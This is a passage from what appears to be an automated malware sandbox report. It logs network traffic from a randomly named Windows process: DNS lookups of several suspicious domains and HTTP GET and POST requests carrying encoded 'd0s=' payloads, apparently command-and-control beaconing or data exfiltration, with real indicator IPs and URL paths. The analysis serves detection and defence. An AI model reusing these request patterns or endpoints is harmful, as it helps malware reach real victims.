Nov 27, 2024 08:55:54.174463034 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:54.174637079 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:54.178606033 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:54.178720951 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:54.178827047 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:54.184987068 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:54.185091019 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:54.185178995 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:54.192250013 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:54.312237024 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:56:00.931967974 CET	49950	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:01.053219080 CET	80	49950	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:01.053369999 CET	49950	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:01.072271109 CET	49950	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:01.192285061 CET	80	49950	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:02.587194920 CET	49950	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:02.648123026 CET	80	49950	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:02.648224115 CET	49950	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:02.708937883 CET	80	49950	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:02.709197998 CET	49950	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:03.605808020 CET	49956	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:03.726464033 CET	80	49956	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:03.726562977 CET	49956	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:03.744219065 CET	49956	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:03.864140034 CET	80	49956	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:05.260056019 CET	49956	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:05.304394007 CET	80	49956	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:05.304456949 CET	49956	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:05.380578995 CET	80	49956	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:05.380629063 CET	49956	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:06.278023958 CET	49962	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:06.398736000 CET	80	49962	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:06.398835897 CET	49962	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:06.415921926 CET	49962	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:06.536415100 CET	80	49962	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:06.536431074 CET	80	49962	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:07.920593023 CET	49962	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:07.989901066 CET	80	49962	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:07.989964962 CET	49962	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:08.040853977 CET	80	49962	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:08.040906906 CET	49962	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:08.934087992 CET	49970	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:09.054012060 CET	80	49970	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:09.054430962 CET	49970	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:09.064431906 CET	49970	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:09.184875011 CET	80	49970	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:10.624063969 CET	80	49970	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:10.666116953 CET	49970	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:10.868180990 CET	80	49970	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:10.869313002 CET	49970	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:10.872597933 CET	49970	80	192.168.2.7	120.26.240.121
Nov 27, 2024 08:56:10.992472887 CET	80	49970	120.26.240.121	192.168.2.7
Nov 27, 2024 08:56:16.379940987 CET	49988	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:16.500080109 CET	80	49988	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:16.500184059 CET	49988	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:16.520050049 CET	49988	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:16.640218973 CET	80	49988	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:17.723216057 CET	80	49988	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:17.723710060 CET	80	49988	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:17.723762035 CET	49988	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:20.024852037 CET	49988	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:21.043492079 CET	49996	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:21.163594961 CET	80	49996	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:21.166690111 CET	49996	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:21.181942940 CET	49996	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:21.301956892 CET	80	49996	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:22.397032022 CET	80	49996	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:22.397157907 CET	80	49996	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:22.397290945 CET	49996	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:22.696913004 CET	49996	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:23.715647936 CET	49997	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:23.835675955 CET	80	49997	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:23.835788012 CET	49997	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:23.851372957 CET	49997	80	192.168.2.7	209.74.77.108
Nov 27, 2024 08:56:23.971704006 CET	80	49997	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:23.971805096 CET	80	49997	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:25.102813959 CET	80	49997	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:25.102847099 CET	80	49997	209.74.77.108	192.168.2.7
Nov 27, 2024 08:56:25.106200933 CET	49997	80	192.168.2.7	209.74.77.108

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2024 08:55:01.348349094 CET	61387	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:55:02.393825054 CET	61387	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:55:02.512177944 CET	53	61387	1.1.1.1	192.168.2.7
Nov 27, 2024 08:55:02.531305075 CET	53	61387	1.1.1.1	192.168.2.7
Nov 27, 2024 08:55:18.997452021 CET	50881	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:55:19.550736904 CET	53	50881	1.1.1.1	192.168.2.7
Nov 27, 2024 08:55:34.304004908 CET	58766	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:55:34.528830051 CET	53	58766	1.1.1.1	192.168.2.7
Nov 27, 2024 08:55:42.590471029 CET	64450	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:55:43.603003979 CET	64450	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:55:44.312582016 CET	53	64450	1.1.1.1	192.168.2.7
Nov 27, 2024 08:55:44.312607050 CET	53	64450	1.1.1.1	192.168.2.7
Nov 27, 2024 08:55:59.200455904 CET	55578	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:56:00.212276936 CET	55578	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:56:00.926677942 CET	53	55578	1.1.1.1	192.168.2.7
Nov 27, 2024 08:56:00.926702023 CET	53	55578	1.1.1.1	192.168.2.7
Nov 27, 2024 08:56:15.896927118 CET	49962	53	192.168.2.7	1.1.1.1
Nov 27, 2024 08:56:16.376112938 CET	53	49962	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 27, 2024 08:55:01.348349094 CET	192.168.2.7	1.1.1.1	0xf277	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:02.393825054 CET	192.168.2.7	1.1.1.1	0xf277	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:18.997452021 CET	192.168.2.7	1.1.1.1	0x56be	Standard query (0)	www.zxyck.net	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:34.304004908 CET	192.168.2.7	1.1.1.1	0x57f1	Standard query (0)	www.egldfi.xyz	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:42.590471029 CET	192.168.2.7	1.1.1.1	0x5798	Standard query (0)	www.sankan-fukushi.info	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:43.603003979 CET	192.168.2.7	1.1.1.1	0x5798	Standard query (0)	www.sankan-fukushi.info	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:59.200455904 CET	192.168.2.7	1.1.1.1	0xf4ac	Standard query (0)	www.buckser.info	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:56:00.212276936 CET	192.168.2.7	1.1.1.1	0xf4ac	Standard query (0)	www.buckser.info	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:56:15.896927118 CET	192.168.2.7	1.1.1.1	0xc3b8	Standard query (0)	www.innovateideas.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 27, 2024 08:55:02.512177944 CET	1.1.1.1	192.168.2.7	0xf277	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:02.531305075 CET	1.1.1.1	192.168.2.7	0xf277	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:19.550736904 CET	1.1.1.1	192.168.2.7	0x56be	No error (0)	www.zxyck.net		118.107.250.103	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:34.528830051 CET	1.1.1.1	192.168.2.7	0x57f1	Name error (3)	www.egldfi.xyz	none	none	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:44.312582016 CET	1.1.1.1	192.168.2.7	0x5798	No error (0)	www.sankan-fukushi.info		163.44.185.183	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:55:44.312607050 CET	1.1.1.1	192.168.2.7	0x5798	No error (0)	www.sankan-fukushi.info		163.44.185.183	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:56:00.926677942 CET	1.1.1.1	192.168.2.7	0xf4ac	No error (0)	www.buckser.info		120.26.240.121	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:56:00.926702023 CET	1.1.1.1	192.168.2.7	0xf4ac	No error (0)	www.buckser.info		120.26.240.121	A (IP address)	IN (0x0001)	false
Nov 27, 2024 08:56:16.376112938 CET	1.1.1.1	192.168.2.7	0xc3b8	No error (0)	www.innovateideas.xyz		209.74.77.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.madhf.tech

www.zxyck.net

www.sankan-fukushi.info

www.buckser.info

www.innovateideas.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49810	103.224.182.242	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:55:02.716839075 CET	537	OUT	GET /1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD++abO8It5JcYPCkPcOnqYQu5/zxEcd3IbUYbMxclbWYqlxIiHqv/fheI5hwT1ENg4LFl9g3AAN4+0x46fdQyv+QgeI438A50saYg1ayC/pKrpcm8Y/XPrUV&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1 Host: www.madhf.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 27, 2024 08:55:03.951308966 CET	1236	IN	HTTP/1.1 200 OK date: Wed, 27 Nov 2024 07:55:03 GMT server: Apache set-cookie: __tad=1732694103.8961630; expires=Sat, 25-Nov-2034 07:55:03 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 1553 content-type: text/html; charset=UTF-8 connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 31 62 6b 6c 2f 3f 64 30 73 3d 55 59 32 32 69 62 41 48 53 4b 43 4b 4a 39 46 6a 50 42 56 7a 44 2b 2b 61 62 4f 38 49 74 35 4a 63 59 50 43 6b 50 63 4f 6e 71 59 51 75 35 2f 7a 78 45 63 64 33 49 62 55 59 62 4d 78 63 6c 62 57 59 71 6c 78 49 69 48 71 76 2f 66 68 65 49 35 68 77 54 31 45 4e 67 34 4c 46 6c 39 67 33 41 41 4e 34 2b 30 78 34 36 66 64 51 79 76 2b 51 67 65 49 34 33 38 41 35 30 73 61 59 67 31 61 79 43 2f 70 4b 72 70 63 6d 38 59 2f 58 50 72 [TRUNCATED] Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD++abO8It5JcYPCkPcOnqYQu5/zxEcd3IbUYbMxclbWYqlxIiHqv/fheI5hwT1ENg4LFl9g3AAN4+0x46fdQyv+QgeI438A50saYg1ayC/pKrpcm8Y/XPrUV&Zvd8B=gHrX0lXPMBRt-RA&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><b
Nov 27, 2024 08:55:03.951390028 CET	589	IN	Data Raw: 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f Data Ascii: ody bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD++abO8It5JcYPCkPcOnqYQu5/zxEcd3IbUYbMxclbWYqlxIiHqv/fheI5hwT1ENg4LFl9g3AAN4+0x46fdQyv+QgeI438A50saYg1ayC/pKrpcm8Y/X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49849	118.107.250.103	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:55:19.696070910 CET	780	OUT	POST /yp7g/ HTTP/1.1 Host: www.zxyck.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.zxyck.net Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.zxyck.net/yp7g/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 7a 33 72 70 4f 48 56 51 6c 74 76 2f 6b 4d 61 73 61 72 49 56 72 6a 35 41 35 67 53 79 39 4c 41 79 63 71 72 72 6c 79 54 6c 46 51 2f 7a 4a 39 6f 56 72 71 61 5a 6c 79 6a 6a 73 35 43 37 50 2f 39 46 33 53 62 37 63 76 33 62 31 47 35 63 68 69 79 4d 4b 49 4d 41 70 6d 35 2f 70 39 6a 57 70 73 35 71 41 51 46 46 42 56 71 70 64 4c 31 53 2b 38 33 71 61 45 55 6b 6e 41 43 6b 69 65 42 68 35 49 39 2b 7a 59 70 31 48 39 45 4b 6a 6d 48 56 70 2b 65 56 33 4a 7a 76 58 49 46 70 51 5a 68 56 32 67 65 30 57 5a 64 63 74 72 52 4e 4b 66 34 76 72 65 72 71 68 4d 6c 63 4e 34 6f 75 48 47 47 31 78 53 48 42 58 48 4d 61 4d 41 74 7a 32 41 6d 47 59 76 71 42 75 77 3d 3d Data Ascii: d0s=z3rpOHVQltv/kMasarIVrj5A5gSy9LAycqrrlyTlFQ/zJ9oVrqaZlyjjs5C7P/9F3Sb7cv3b1G5chiyMKIMApm5/p9jWps5qAQFFBVqpdL1S+83qaEUknACkieBh5I9+zYp1H9EKjmHVp+eV3JzvXIFpQZhV2ge0WZdctrRNKf4vrerqhMlcN4ouHGG1xSHBXHMaMAtz2AmGYvqBuw==
Nov 27, 2024 08:55:21.295358896 CET	308	IN	HTTP/1.1 200 OK Server: Tengine Date: Wed, 27 Nov 2024 07:54:19 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Content-Encoding: gzip Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd ca 02 f3 74 3d 00 bd 2f 05 cb 1c 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2e///lt=/0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49859	118.107.250.103	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:55:22.368973970 CET	800	OUT	POST /yp7g/ HTTP/1.1 Host: www.zxyck.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.zxyck.net Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 236 Connection: close Referer: http://www.zxyck.net/yp7g/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 7a 33 72 70 4f 48 56 51 6c 74 76 2f 6c 73 71 73 62 4d 38 56 71 44 35 44 6c 77 53 79 30 72 41 75 63 71 6e 72 6c 7a 58 31 46 43 72 7a 4a 64 59 56 71 6f 69 5a 6d 79 6a 6a 6a 5a 43 36 52 50 38 4c 33 53 58 4a 63 71 33 62 31 47 64 63 68 6d 69 4d 4b 5a 4d 44 70 32 34 5a 68 64 6a 44 30 38 35 71 41 51 46 46 42 52 43 48 64 4c 39 53 2b 76 2f 71 56 47 38 6e 75 67 43 6e 32 4f 42 68 7a 6f 39 36 7a 59 70 44 48 2b 41 73 6a 67 4c 56 70 2f 4f 56 33 61 72 6f 5a 49 46 7a 49 35 67 70 32 41 62 73 63 59 4e 30 6e 39 64 71 47 50 77 50 6a 49 71 49 37 75 70 77 54 70 51 56 44 45 69 44 6d 30 61 30 56 47 49 43 42 69 5a 53 70 33 44 73 56 39 4c 46 34 48 39 77 4f 30 66 6a 2b 53 48 75 42 66 31 75 2b 7a 72 54 6d 75 45 3d Data Ascii: d0s=z3rpOHVQltv/lsqsbM8VqD5DlwSy0rAucqnrlzX1FCrzJdYVqoiZmyjjjZC6RP8L3SXJcq3b1GdchmiMKZMDp24ZhdjD085qAQFFBRCHdL9S+v/qVG8nugCn2OBhzo96zYpDH+AsjgLVp/OV3aroZIFzI5gp2AbscYN0n9dqGPwPjIqI7upwTpQVDEiDm0a0VGICBiZSp3DsV9LF4H9wO0fj+SHuBf1u+zrTmuE=
Nov 27, 2024 08:55:23.960669994 CET	308	IN	HTTP/1.1 200 OK Server: Tengine Date: Wed, 27 Nov 2024 07:54:22 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Content-Encoding: gzip Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd ca 02 f3 74 3d 00 bd 2f 05 cb 1c 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2e///lt=/0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49865	118.107.250.103	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:55:25.040004969 CET	1813	OUT	POST /yp7g/ HTTP/1.1 Host: www.zxyck.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.zxyck.net Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1248 Connection: close Referer: http://www.zxyck.net/yp7g/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 7a 33 72 70 4f 48 56 51 6c 74 76 2f 6c 73 71 73 62 4d 38 56 71 44 35 44 6c 77 53 79 30 72 41 75 63 71 6e 72 6c 7a 58 31 46 43 7a 7a 4a 50 51 56 72 4a 69 5a 6e 79 6a 6a 71 35 43 2f 52 50 38 47 33 53 50 4e 63 71 79 35 31 45 56 63 67 45 71 4d 66 62 6f 44 6a 32 34 5a 74 39 6a 58 70 73 35 2f 41 51 56 42 42 56 65 48 64 4c 39 53 2b 75 50 71 53 55 55 6e 6f 67 43 6b 69 65 42 39 35 49 39 43 7a 59 67 32 48 39 73 61 69 51 72 56 71 66 2b 56 32 6f 7a 6f 47 34 46 74 64 35 67 78 32 42 6e 4e 63 63 74 34 6e 39 42 51 47 49 38 50 70 4e 66 52 73 74 42 31 43 5a 49 31 48 46 76 6c 6f 31 76 42 4d 6d 34 2b 43 42 74 62 6c 45 66 72 59 37 7a 57 7a 54 67 39 52 32 2b 56 37 42 48 4f 42 4c 4d 39 36 43 72 67 7a 35 49 52 39 75 52 71 45 56 58 6b 74 6d 67 36 38 33 78 42 6b 67 67 72 68 79 6e 2f 34 56 62 58 4f 62 6f 62 68 6a 7a 47 6a 69 34 4f 55 54 4e 79 51 62 4c 43 37 52 36 57 69 49 69 35 6b 6c 44 38 6c 45 64 31 56 6d 73 4b 6c 70 66 58 7a 57 42 79 31 30 6f 34 52 68 4c 62 50 41 6b 4a 51 6b 59 4c 4d 48 4f 4d 35 36 4f 7a 36 47 [TRUNCATED] Data Ascii: d0s=z3rpOHVQltv/lsqsbM8VqD5DlwSy0rAucqnrlzX1FCzzJPQVrJiZnyjjq5C/RP8G3SPNcqy51EVcgEqMfboDj24Zt9jXps5/AQVBBVeHdL9S+uPqSUUnogCkieB95I9CzYg2H9saiQrVqf+V2ozoG4Ftd5gx2BnNcct4n9BQGI8PpNfRstB1CZI1HFvlo1vBMm4+CBtblEfrY7zWzTg9R2+V7BHOBLM96Crgz5IR9uRqEVXktmg683xBkggrhyn/4VbXObobhjzGji4OUTNyQbLC7R6WiIi5klD8lEd1VmsKlpfXzWBy10o4RhLbPAkJQkYLMHOM56Oz6GeFJ0AQQk0DidMmBFYsjzC++0xfeb5vErBcJTFvHZXJXAcMEjqHVLQtF7Q5n1APElgcDa5GZHXvk7NPwAzqGIz0dxfVI5s7I5fLLF6qnuacJPP7J6LkXR4VyZL5h+cEwyoezjZQbzEHFxImA6pAAEGa+ArEIBoCcH9A7KK9RD9jrC0ocsg+kcLYVJcS1p7u50MRD2KevmuqSC3p8LtFVnuIU2bcYeWAmZxxsT45vclFXU/ZCvO893cmZRvVy99Mp39yPN6ZbFsMGdP42kKjAm/xgtyXu2cXur5Ul7J+E6OYwiVZVrII1h7Y3RcF8ddqNxEIyy7dZluzQVhKzIgoF+rSMwOGyTx0IPJkw1Ooo/K7YMD/Ji2o6puoP7xcVTL+k/Ko1e5NPFLKkPCyp/LSXj3mc64vHovmxVfA86gI6+Kh0Qmh3BTICos9oFS0D4i8P6wnZkYhmOhMU3POr0+ox5FQg0B+yM3GLphQpDTF2jmcVnQnoy8YrNd+B7eOZE6gO101qVHsWljQ9OhYAhWTb9Muo4eQKVmWGvtPqilZbU4pfOvuoGOW6GjJbjMrWAsPFoAiLXXETMqdm7807XVD9c/+vnNEus7hY27Fl73P6XLWQ7PUa9Nf6XH8FG0yqqVLn0LSaXoY+Y+I70s4fySXViVQRpn+8n6ChEua [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49871	118.107.250.103	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:55:27.705939054 CET	536	OUT	GET /yp7g/?d0s=+1DJNz9gq8XLlcrIMdQnpjVtkmq+0J8qQJntyAnHY0zwXJ4Cq6+S40LPv7uqAO8gziztE9nyxlcHp2WlW5MCgSEQjuWrksErLkV7H3W7JIE6+fLHeWIbuzK7jcVo7JJSnKFcAfYIk0fk&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1 Host: www.zxyck.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 27, 2024 08:55:29.256972075 CET	266	IN	HTTP/1.1 200 OK Server: Tengine Date: Wed, 27 Nov 2024 07:54:27 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 79 70 37 67 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1c/www/wwwroot/zxyck.net/yp7g.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49908	163.44.185.183	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
